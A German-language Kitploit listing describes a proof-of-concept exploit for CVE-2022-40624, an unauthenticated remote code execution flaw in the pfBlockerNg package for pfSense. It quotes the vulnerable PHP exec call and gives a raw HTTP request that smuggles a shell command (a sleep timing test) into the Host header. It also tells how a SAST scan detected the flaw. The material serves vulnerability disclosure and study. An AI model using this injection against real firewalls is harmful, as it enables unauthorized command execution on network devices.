Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
pfBlockerNg-CVE-2022-40624 — Proof-of-concept-Exploit für nicht authentifizierte Remote-Codeausführung in pfBlockerNg über nicht bereinigte Eingaben in der DNSBL-TLD-Abfragefunktion, mit SAST-Erkennungsanalyse. | Kitploit
Tools/GitHubGitHub/dhammon/pfblockerng-cve-2022-40624
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubdhammon/pfblockerng-cve-2022-40624

pfBlockerNg-CVE-2022-40624

Proof-of-concept-Exploit für nicht authentifizierte Remote-Codeausführung in pfBlockerNg über nicht bereinigte Eingaben in der DNSBL-TLD-Abfragefunktion, mit SAST-Erkennungsanalyse.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 3 JahrenNoch nicht geprüft

pfBlockerNg-CVE-2022-40624

Hintergrund

pfBlockerNG ist die nächste Generation von pfBlocker mit den folgenden Funktionen:

  1. Verwalten Sie IPv4/v6-Listenquellen in 'Verweigern, Zulassen oder Übereinstimmen' Formaten.
  2. GeoIP-Datenbank von MaxMind Inc. (GeoLite2 Free version).
  3. Deduplizierung, Unterdrückung und Reputationsverbesserungen.
  4. Bereitstellung zum Herunterladen aus verschiedenen Listenformaten.
  5. Erweiterte Integration für Proofpoint ET IQRisk IP Reputation Threat Sources.
  6. Domainnamen (DNSBL)-Sperrung über den Unbound DNS Resolver.

https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html

Betroffene Versionen

pfBlockerNg <2.1.4_27

Sicherheitslücke

Nicht authentifizierte Remote-Code-Ausführung (RCE)

Die Abfrage für den TLD-Block-Bereich von index.php enthält eine nicht bereinigte/nicht escapte Benutzereingabe d_query aus der HEADER-Host-Quelle in die PHP-exec-Funktionssenke.

exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

/pfblockerng/www/index.php

root@kitploit:~
// Query for a TLD Block
if (empty($pfb_query)) {
	$idparts	= explode('.', $query);
	$idcnt		= (count($idparts) -1);

	for ($i=1; $i <= $idcnt; $i++) {
		$d_query = implode('.', array_slice($idparts, -$i, $i, TRUE));
		exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

		if (!empty($match[0])) {
			$pfb_query = 'DNSBL_TLD';
			break;
		}
	}
}

Ausnutzung

Erfordert HTTP-Zugriff auf die pfsense-Webkonsole Beispiel-Payload: ' *; sleep 5; '

POC-Anfrage:

root@kitploit:~
GET /pfblockerng/www/index.php HTTP/1.1
Host: test.test2' *; sleep 5; '
Content-Length: 2

Inspiration

Ich liebe pfBlockerNg und wurde von Di r00t's kürzlichem CVE-2022-31814 und dem großartigen Writeup https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ inspiriert und war neugierig, ob das Snyk Static Application Security Test (SAST)-Tool die Schwachstelle erkennen würde. Also habe ich die entsprechende index.php-Datei Version 2.1.4_26 heruntergeladen und Snyk Code dagegen ausgeführt. Tatsächlich erkannte Snyk die Schwachstelle plus eine weitere ähnliche Meldung nur wenige Zeilen später.

Tool herunterladen